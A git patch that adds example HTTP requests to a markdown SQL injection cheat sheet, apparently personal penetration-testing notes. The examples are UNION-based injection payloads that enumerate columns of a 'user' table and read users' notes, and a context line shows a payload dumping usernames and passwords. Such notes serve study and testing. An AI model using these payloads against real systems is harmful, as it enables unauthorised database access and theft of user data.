From e89be671481c49b693e4d5d20f7d1f3f88108e3d Mon Sep 17 00:00:00 2001
From: whx
Date: Wed, 29 Sep 2021 01:42:26 +0200
Subject: [PATCH] additions

---
 exploit/sqli/sqli.md | 14 ++++++++++++++
 1 file changed, 14 insertions(+)

diff --git a/exploit/sqli/sqli.md b/exploit/sqli/sqli.md
index 1b4e77b..65c9658 100644
--- a/exploit/sqli/sqli.md
+++ b/exploit/sqli/sqli.md
@@ -103,6 +103,20 @@ id=(SELECT banner FROM v$version) # oracle
 1' and 1=2 union select 1,group_concat(username,0x3a,password),3,4 from user-- -
 ```
+### Examples
+* sqli inside HTTP request to an API. Five values inside select have been discovered before
+```HTTP
+GET /about/0 UNION select column_name, null,null,null,null from information_schema.columns where table_name = 'user' HTTP/1.1
+```
+ * Get col names
+ ```HTTP
+ GET /about/0 UNION all select group_concat(column_name), null,null,null,null from information_schema.columns where table_name = 'user' HTTP/1.1
+ ```
+ * Get notes from users by id
+ ```HTTP
+ GET /about/0 UNION all select notes, null, null, null, null from users where id = 4711 HTTP/1.1
+ ```
+
 ## Tools
 ### SQLmap
 * [sqlmap](https://github.com/sqlmapproject/sqlmap.git)